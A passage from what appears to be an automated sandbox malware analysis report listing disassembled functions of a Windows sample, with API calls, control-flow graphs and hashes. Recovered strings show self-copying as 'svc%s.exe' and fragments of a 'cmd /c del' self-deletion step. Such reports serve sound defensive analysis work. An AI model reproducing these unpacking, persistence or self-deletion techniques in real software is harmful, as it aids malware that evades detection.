                                                                                                                            • Instruction Fuzzy Hash: 30914A72E14628CBDB1ECA68CC617FEB676FBC0308F59866DD307ABD45DB7459408A40
                                                                                                                            Function 003B1B34 Relevance: 1.7, APIs: 1, Instructions: 192memorythreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?,26417AC6), ref: 003B1B61
                                                                                                                            • RtlExitUserThread.NTDLL(?,00000000,?,26417AC6), ref: 003B21D8
                                                                                                                              • Part of subcall function 003B1DD0: VirtualAlloc.KERNEL32(?,998B1F24), ref: 003B1E3C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocExitProtectThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2339163276-0
                                                                                                                            • Opcode ID: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction ID: d11414774b37c3b90990411d8fa416d26fee2612cd36c7dbb02eddf4be44f503
                                                                                                                            • Opcode Fuzzy Hash: eeecd8ac049aa3eeb4b77f0e56db14689fd2e68504fb283cb04641ebfd057cb7
                                                                                                                            • Instruction Fuzzy Hash: 89612C72E14328CFDB1ACE64CC917EDB776FB80308F5586AEC106ABA44DB7059459F80
                                                                                                                            Function 0041DDD0 Relevance: 22.6, APIs: 15, Instructions: 109COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(00000057,75DC55D0,?,0041D8BB,?), ref: 0041DDED
                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,0041D8BB,00000000,75DC55D0,?,0041D8BB,?), ref: 0041DE01
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,0041D8BB,?), ref: 0041DE08
                                                                                                                            • GetLastError.KERNEL32(?,0041D8BB,?), ref: 0041DE12
                                                                                                                            • CloseHandle.KERNEL32(0041D8BB), ref: 0041DE9C
                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,?,0041D8BB,?), ref: 0041DEAA
                                                                                                                            • SetLastError.KERNEL32(?,?,0041D8BB,?), ref: 0041DEBD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Process$CloseCurrentFreeHandleLocalOpenToken
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1977215774-0
                                                                                                                            • Opcode ID: c3f24fab59104aeebdad769a3f0e064d37fd30a399ed324870e09b765df70f4b
                                                                                                                            • Instruction ID: 1eea03d9ae6eddd41489c6ef4305d71b5ef469a94ef1391061eac8053bd55b54
                                                                                                                            • Opcode Fuzzy Hash: c3f24fab59104aeebdad769a3f0e064d37fd30a399ed324870e09b765df70f4b
                                                                                                                            • Instruction Fuzzy Hash: 7431A2B5D00208EFCB14DFA8DC48AEFBBB8EF58311F108566E905D7210D7349A819BA4
                                                                                                                            Function 0041DEE0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 110fileprocessCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041DF18
                                                                                                                              • Part of subcall function 00421AA0: GetTickCount.KERNEL32(?,?,?,?,004137A9,0043CD18,00000005), ref: 00421AB0
                                                                                                                              • Part of subcall function 00421AA0: _rand.LIBCMT ref: 00421AC0
                                                                                                                              • Part of subcall function 00421AA0: Sleep.KERNEL32(0000000F), ref: 00421AE7
                                                                                                                            • PathFindFileNameW.SHLWAPI(004C6B20), ref: 0041DF31
                                                                                                                              • Part of subcall function 0041F000: __strftime_l.LIBCMT ref: 0041F015
                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041DF6E
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,75DC55D0,?,0041D906), ref: 0041DF76
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041DF7F
                                                                                                                            • CopyFileW.KERNEL32 ref: 0041DFCC
                                                                                                                            • _memset.LIBCMT ref: 0041DFD7
                                                                                                                            • CreateProcessW.KERNEL32 ref: 0041E015
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Create_memset$CloseCopyCountErrorFindHandleLastNamePathProcessSleepTick__strftime_l_rand
                                                                                                                            • String ID: %s\%s$%s\svc%s.exe$D
                                                                                                                            • API String ID: 2352187395-2913687874
                                                                                                                            • Opcode ID: 2dd53856c5fa4189dcea7410aa1e0da30bc8838a559425b84c8582e3eeeed172
                                                                                                                            • Instruction ID: a58a0c032f7148f8b8d39ec015e3b63cf3cbfd45348febe8a0205d2eea09b8c4
                                                                                                                            • Opcode Fuzzy Hash: 2dd53856c5fa4189dcea7410aa1e0da30bc8838a559425b84c8582e3eeeed172
                                                                                                                            • Instruction Fuzzy Hash: 0D31A9717543406BE320DB64DC46FAB73A8EB88710F50491EF648DB1D1EBB5A504C7AA
                                                                                                                            Function 0041E050 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 72COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,0041E020), ref: 0041E075
                                                                                                                            • GetShortPathNameW.KERNEL32(?,?,00001000,?,0041E020), ref: 0041E092
                                                                                                                            • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00001000,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0041E0FD
                                                                                                                            • ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,00000000), ref: 0041E11D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Name$EnvironmentExecuteFileModulePathShellShortVariable
                                                                                                                            • String ID: >> NUL$/c del $ComSpec
                                                                                                                            • API String ID: 1296078269-547624796
                                                                                                                            • Opcode ID: 90392c2e7649506585ef2f2f5335fc0281aa0d27aaf40c4818beb0e0c177e805
                                                                                                                            • Instruction ID: a9eb13e3e64ffb1a7c6eb7d3c2949bb5ef406e474b692f1edf18b5435e39ebdc
                                                                                                                            • Opcode Fuzzy Hash: 90392c2e7649506585ef2f2f5335fc0281aa0d27aaf40c4818beb0e0c177e805
                                                                                                                            • Instruction Fuzzy Hash: 4221A774740218B6E714DB61DD86FE97378DB0C741F404099F705E61C1DAB8AA848B5C
                                                                                                                            Function 003B1DD0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 319memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 185 3b1dd0-3b1e0d call 3b0af8 188 3b1e12-3b1e13 call 3b0af8 185->188 191 3b1e01-3b1e0d 188->191 192 3b1e17-3b1ea8 call 3b0c47 VirtualAlloc call 3b1ebb 188->192 191->188 203 3b1eaa-3b1eaf 192->203 204 3b1f16-3b1f1b 192->204 205 3b1f23-3b1f26 203->205 206 3b1eb1 203->206 204->205 207 3b1f27-3b1f3b 205->207 206->207 208 3b1eb4-3b1eb7 206->208 212 3b1fe3-3b20ac call 3b12ba call 3b0f8f call 3b1564 call 3b20b8 207->212 213 3b1f41-3b1f49 207->213 250 3b20ae-3b20af 212->250 251 3b2113 212->251 213->212 214 3b1f4f-3b1f61 call 3b1f6a 213->214 225 3b1fb3-3b1fc1 214->225 226 3b1f63 214->226 228 3b1fc4-3b1fd1 call 3b0c47 225->228 229 3b1f65-3b1fc1 call 3b0af8 * 2 226->229 230 3b1fd4-3b1fd5 226->230 233 3b1fd6-3b1fe2 228->233 229->228 230->233 233->212 252 3b2116-3b2119 250->252 253 3b20b1-3b2119 call 3b0af8 * 2 call 3b0c47 250->253 251->252 254 3b211d-3b21f1 CreateThread call 3b216c call 3b0af8 * 2 call 3b0c47 RtlExitUserThread 252->254 253->254
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(?,998B1F24), ref: 003B1E3C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4275171209-2181537457
                                                                                                                            • Opcode ID: 9974c603624136915df94a0c0e59e4e8d7e35882a5f8b12b24b20c7b99eb25fb
                                                                                                                            • Instruction ID: c37e67a60ffd2681cdd6175e8e3d55d44dccec5ebcdda98b2ef642d8ee967972
                                                                                                                            • Opcode Fuzzy Hash: 9974c603624136915df94a0c0e59e4e8d7e35882a5f8b12b24b20c7b99eb25fb
                                                                                                                            • Instruction Fuzzy Hash: ED916976A105169AEF1F56B4CC26FFE651AEBD0708F68A72CA303DDD92DEBC49409600
                                                                                                                            Function 003B137C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 171memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 287 3b137c-3b148f call 3b0af8 * 2 call 3b0c47 VirtualProtect 300 3b14a9-3b14f1 287->300 301 3b1491-3b14a4 287->301 304 3b14f7-3b1559 300->304 301->300 308 3b155b-3b1561 304->308
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?), ref: 003B13E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764
                                                                                                                            • Opcode ID: 67e91eaf6511cbb0b454f96bb40ffb87ec0ac4c2cf8711cdeed14c2a3f89dabb
                                                                                                                            • Instruction ID: ab9f67bf2255eda0373fbc4b320a88ad0ac4e65b999c5100fa4410afd8d0b24e
                                                                                                                            • Opcode Fuzzy Hash: 67e91eaf6511cbb0b454f96bb40ffb87ec0ac4c2cf8711cdeed14c2a3f89dabb
                                                                                                                            • Instruction Fuzzy Hash: 57510637E101249FEB0DCF69CC91AACB7B6FBD4314F5A9139D506EFA91DA7899008640
                                                                                                                            Function 003B15FA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?), ref: 003B1666
                                                                                                                              • Part of subcall function 003B172B: VirtualProtect.KERNEL32(?,?,?,?), ref: 003B1797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 26fe8618c1ed778c66326f4ff10059ffba76b7031ebd87aff5660734a838b7ac
                                                                                                                            • Instruction ID: 8f8ad23e6ac849275f4e9891f576b5ab19cd7cf00d0f2a1039eca34239702680
                                                                                                                            • Opcode Fuzzy Hash: 26fe8618c1ed778c66326f4ff10059ffba76b7031ebd87aff5660734a838b7ac
                                                                                                                            • Instruction Fuzzy Hash: E3416D33A204129AEB0D5B68CD76BFD6799EBD4308FADD63DA603DED82DD7C48409250
                                                                                                                            Function 003B13BB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 151memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 353 3b13bb-3b13ef call 3b0c47 VirtualProtect 359 3b13f4-3b148f 353->359 361 3b14a9-3b14f1 359->361 362 3b1491-3b14a4 359->362 365 3b14f7-3b1559 361->365 362->361 369 3b155b-3b1561 365->369
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?), ref: 003B13E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: *$0$>
                                                                                                                            • API String ID: 544645111-1994514764
                                                                                                                            • Opcode ID: eefdbbdade2e8677b69017dcfd66dc889ed3c473aa5c061021d319c82d4ac5a4
                                                                                                                            • Instruction ID: 11a388df12cafc5030a0785994594765346dda293cc2246fac630d6a5f7ee1e4
                                                                                                                            • Opcode Fuzzy Hash: eefdbbdade2e8677b69017dcfd66dc889ed3c473aa5c061021d319c82d4ac5a4
                                                                                                                            • Instruction Fuzzy Hash: 5341B637E00128DFDF0DCF99D891AACB7B6FBD4314F569125D90AAFA91DB7499008680
                                                                                                                            Function 003B1639 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 370 3b1639-3b16aa call 3b0c47 VirtualProtect 380 3b16ad-3b1724 call 3b0eb7 call 3b172b 370->380 389 3b1726-3b1792 call 3b0af8 * 2 call 3b0c47 380->389 390 3b1795-3b1796 380->390 392 3b1797-3b179e VirtualProtect 389->392 390->392 393 3b17a3-3b17d0 392->393 393->380 403 3b17d6-3b17e4 393->403
                                                                                                                            APIs
                                                                                                                            • VirtualProtect.KERNEL32(?,?), ref: 003B1666
                                                                                                                              • Part of subcall function 003B172B: VirtualProtect.KERNEL32(?,?,?,?), ref: 003B1797
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID: /$;
                                                                                                                            • API String ID: 544645111-2360594509
                                                                                                                            • Opcode ID: 10b6dff0dc5a8fdf983ee27d7db3e209437fd1f8d0a4512bde890e7057a9382f
                                                                                                                            • Instruction ID: b47182c12ffc905e9b92c79c0d7090d322619c4e786f568ce53ad47f9d2b3885
                                                                                                                            • Opcode Fuzzy Hash: 10b6dff0dc5a8fdf983ee27d7db3e209437fd1f8d0a4512bde890e7057a9382f
                                                                                                                            • Instruction Fuzzy Hash: C7417A33A100129BDB0D5BA8CC767FDB799EBD4308FA9C62D9603EED82DE7844409250
                                                                                                                            Function 0041E7A0 Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 409 41e7a0-41e7c6 CreateFileW 410 41e804-41e80a 409->410 411 41e7c8-41e7f4 SetFilePointer ReadFile CloseHandle 409->411 411->410 412 41e7f6-41e7f9 411->412 412->410 413 41e7fb-41e803 412->413
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(004C6B20,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041E7BB
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000064,00000000,00000000,?,0041D888), ref: 0041E7CF
                                                                                                                            • ReadFile.KERNEL32(00000000,0041D888,00000004,?,00000000), ref: 0041E7E2
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041E7E9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandlePointerRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4133201480-0
                                                                                                                            • Opcode ID: 1a1e99fa9a9fddd772163efd5d35fe45a9f919362a9285d703c580583bd4ed59
                                                                                                                            • Instruction ID: 434d6d844fe2b3ef8dad71a426d5a1eb9601029910844f721659a462d3881f6e
                                                                                                                            • Opcode Fuzzy Hash: 1a1e99fa9a9fddd772163efd5d35fe45a9f919362a9285d703c580583bd4ed59
                                                                                                                            • Instruction Fuzzy Hash: C7F06835A8535476FB20A7946C0AFED7B68C705B11F100196FF04B61D0E6A51A55C3AE
                                                                                                                            Function 003B1EBB Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 278COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 22a14f89a05aac5094d3beed024d389ebe806773abddd533013f3921c93655df
                                                                                                                            • Instruction ID: 13591b973f6355c16ce571d16dcb8397e23abc7f0ca11e69723d84fac2966cdc
                                                                                                                            • Opcode Fuzzy Hash: 22a14f89a05aac5094d3beed024d389ebe806773abddd533013f3921c93655df
                                                                                                                            • Instruction Fuzzy Hash: 25716D76A5461699FB1F62B4CC26BFE650AEBD0719F68E73CA303DDDD2CEAC44409500
                                                                                                                            Function 003B1EFA Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 251COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 7a2d50deffb679e04c43d79dccdb1bf83c3a2446d70cb0eb78214827ec212f58
                                                                                                                            • Instruction ID: 1b7047dac3b83d7339c986b6c875e647a712e5ae3878012ecc699684ace489f6
                                                                                                                            • Opcode Fuzzy Hash: 7a2d50deffb679e04c43d79dccdb1bf83c3a2446d70cb0eb78214827ec212f58
                                                                                                                            • Instruction Fuzzy Hash: 5A618076A1061699FB1F62B8CC26BFE655AEBD0719F6CE73CA303DCD92CEAC04409500
                                                                                                                            Function 003B1F25 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 239COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 761417fe31841237f05dc1249596a422ea29c60b576457c36bb18d40a5205923
                                                                                                                            • Instruction ID: b07739c11cc29443b5ee4368a424696dae1e963f08ec23aa9e327e24d824bc61
                                                                                                                            • Opcode Fuzzy Hash: 761417fe31841237f05dc1249596a422ea29c60b576457c36bb18d40a5205923
                                                                                                                            • Instruction Fuzzy Hash: 77518F76A1461699FB1F52B8CC26BFE651AEBD0719F68E73CA303DDD92CEAC04409500
                                                                                                                            Function 003B1013 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233libraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 671 3b1013-3b109c call 3b0af8 * 2 call 3b0c47 LoadLibraryA 684 3b109e-3b10ab 671->684 685 3b10ad-3b10b8 671->685 687 3b10ba-3b10f7 684->687 685->687 692 3b124e-3b1264 687->692 693 3b10fd-3b1107 687->693 701 3b1299-3b12a8 692->701 702 3b1266-3b1279 692->702 694 3b1109-3b1125 693->694 695 3b1127-3b1142 693->695 704 3b1147-3b1163 call 3b116e 694->704 695->704 705 3b127b-3b127e 702->705 712 3b1165-3b11d3 call 3b0af8 * 2 call 3b0c47 704->712 713 3b11d4-3b11f8 704->713 706 3b1280-3b1293 705->706 707 3b1295-3b1297 705->707 706->705 707->701 712->713 722 3b11fa-3b1206 713->722 723 3b123e-3b1249 713->723 725 3b1208-3b1216 722->725 726 3b1236-3b123b 722->726 727 3b1218-3b121b 725->727 726->723 729 3b122d-3b1231 727->729 730 3b121d-3b122b 727->730 729->726 730->727
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID: j$l
                                                                                                                            • API String ID: 1029625771-267213617
                                                                                                                            • Opcode ID: 2791edf6c800f60ef0955ebe1f92a9428c0b75e805e56d5d4f0ccbfc677ce817
                                                                                                                            • Instruction ID: a90167ef52a92dfe087106add8d90e774852ea4e3b08ef77eeaa3455bffca05c
                                                                                                                            • Opcode Fuzzy Hash: 2791edf6c800f60ef0955ebe1f92a9428c0b75e805e56d5d4f0ccbfc677ce817
                                                                                                                            • Instruction Fuzzy Hash: 89615472E541428EEB0F9668CC717FDA69AEBC0309FA8D53D8703DEDC1CE7845409650
                                                                                                                            Function 003B1F30 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 232COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 2382ced00d76859903ea9042a21a7f610661b8b4512a8fd4f310670d91341f95
                                                                                                                            • Instruction ID: 167ddec1466d3a99c3e57cd1c1ce13f8730ae39530a0c33b4f787c8e92958cf5
                                                                                                                            • Opcode Fuzzy Hash: 2382ced00d76859903ea9042a21a7f610661b8b4512a8fd4f310670d91341f95
                                                                                                                            • Instruction Fuzzy Hash: E7518076A146169AFB1F52A8CC27BFE6516EBD0718F6CE73CA303DDD86CEAC04408510
                                                                                                                            Function 003B1F58 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 222COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 0-2181537457
                                                                                                                            • Opcode ID: 6a8ed87bcf0e59236ddbef0348ee125da03c90cd37ccd2b7c2bf74579bb87c8c
                                                                                                                            • Instruction ID: c0e35b19ba2a1a7c17095d30f7bff06b78396cc70a3a0e75eef798463deef3df
                                                                                                                            • Opcode Fuzzy Hash: 6a8ed87bcf0e59236ddbef0348ee125da03c90cd37ccd2b7c2bf74579bb87c8c
                                                                                                                            • Instruction Fuzzy Hash: F3518076A546169AFB1F62A8CC16BFF6516EBD0719F6CE73CA303DDD82CEAC04408610
                                                                                                                            Function 003B1F6A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 214COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_3b0000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$CreateExitUser
                                                                                                                            • String ID: p
                                                                                                                            • API String ID: 4108186749-2181537457
                                                                                                                            • Opcode ID: c2566ed6df8e2a862ee5d7d024782d6e601238162e25fa7e902eaa86ddb86992
                                                                                                                            • Instruction ID: 03ab2d3948437ccde97df36a0f6d894d9115ff48df50ce3dea3f31a00bd41e60
                                                                                                                            • Opcode Fuzzy Hash: c2566ed6df8e2a862ee5d7d024782d6e601238162e25fa7e902eaa86ddb86992
                                                                                                                            • Instruction Fuzzy Hash: 11517F76A546169AFB1F62A8CC16BFF651AEBD0719F58E73CA303EDDC2CDAC04408510
                                                                                                                            Function 003B1FA9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345340451.00000000003B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003B0000, based on PE: false
